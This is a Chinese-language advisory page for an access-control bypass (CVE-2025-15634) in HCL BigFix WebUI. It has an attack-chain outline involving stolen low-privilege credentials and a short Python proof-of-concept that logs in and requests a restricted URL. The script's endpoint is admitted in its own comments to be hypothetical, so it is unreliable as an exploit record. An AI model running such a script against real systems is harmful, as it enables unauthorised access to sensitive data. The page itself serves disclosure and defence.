CVE-2025-15634 CVSS 4.3 中危

CVE-2025-15634 HCL BigFix WebUI权限绕过漏洞

披露日期: 2026-05-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15634

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

HCL BigFix WebUI

漏洞概述

HCL BigFix WebUI组件中发现一处权限绕过漏洞。该漏洞源于系统对特定页面的授权验证逻辑缺失，导致经过身份验证的低权限用户可以通过构造并发送特定的URL请求，直接访问本应受限的页面。成功利用此漏洞可导致敏感环境信息泄露，CVSS评分为4.3，风险等级为中危。

技术细节

该漏洞的根本原因在于HCL BigFix WebUI未对部分受控页面实施严格的权限校验机制。在正常的业务逻辑中，只有具备管理员或特定权限的用户才能访问包含敏感环境信息的接口。然而，由于后端服务器在处理直接URL请求时，未验证当前会话用户是否拥有访问该资源的权限，导致访问控制列表（ACL）失效。利用方式相对简单：攻击者首先需要获取一个普通的低权限账户凭证并登录系统。随后，攻击者无需诱骗管理员点击链接，只需通过浏览器直接输入或通过脚本构造指向敏感页面的URL路径。服务器收到请求后，仅校验了用户是否登录，而未校验用户是否有权访问，从而返回了敏感数据。这属于典型的Broken Access Control缺陷。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别出目标系统运行HCL BigFix WebUI，并确定其存在低权限用户接口。

STEP 2

步骤2：获取凭证

攻击者通过钓鱼、社会工程学或暴力破解等方式获取一个普通低权限用户的登录凭证。

STEP 3

步骤3：权限绕过

攻击者使用获取的凭证登录系统，并直接在浏览器中输入或发送针对敏感页面的URL请求，绕过前端菜单限制。

STEP 4

步骤4：信息泄露

服务器因未进行授权校验而返回敏感的环境信息，攻击者成功获取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
target_host = "https://bigfix-server.example.com"
login_endpoint = "/login"
# Hypothetical vulnerable endpoint based on description
vuln_endpoint = "/api/environment/config"

# Low-privileged user credentials
username = "test_user"
password = "test_password"

def exploit():
    session = requests.Session()
    
    # 1. Authenticate with low privileges
    print(f"[*] Logging in as low-priv user: {username}")
    login_payload = {
        "username": username,
        "password": password
    }
    
    try:
        login_resp = session.post(target_host + login_endpoint, data=login_payload, verify=False)
        if login_resp.status_code != 200:
            print("[-] Login failed.")
            return
        
        print("[+] Login successful.")
        
        # 2. Directly access the unauthorized sensitive page
        print(f"[*] Attempting to access sensitive info at: {vuln_endpoint}")
        exploit_resp = session.get(target_host + vuln_endpoint, verify=False)
        
        if exploit_resp.status_code == 200:
            print("[+] Exploit successful! Sensitive data retrieved:")
            print(exploit_resp.text)
        else:
            print(f"[-] Request failed with status code: {exploit_resp.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    exploit()

影响范围

HCL BigFix WebUI (具体受影响版本请参考官方公告KB0130587)

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界（如WAF或反向代理）上实施额外的访问控制策略，限制对敏感URL路径的访问，仅允许受信任的IP地址或特定管理员角色访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表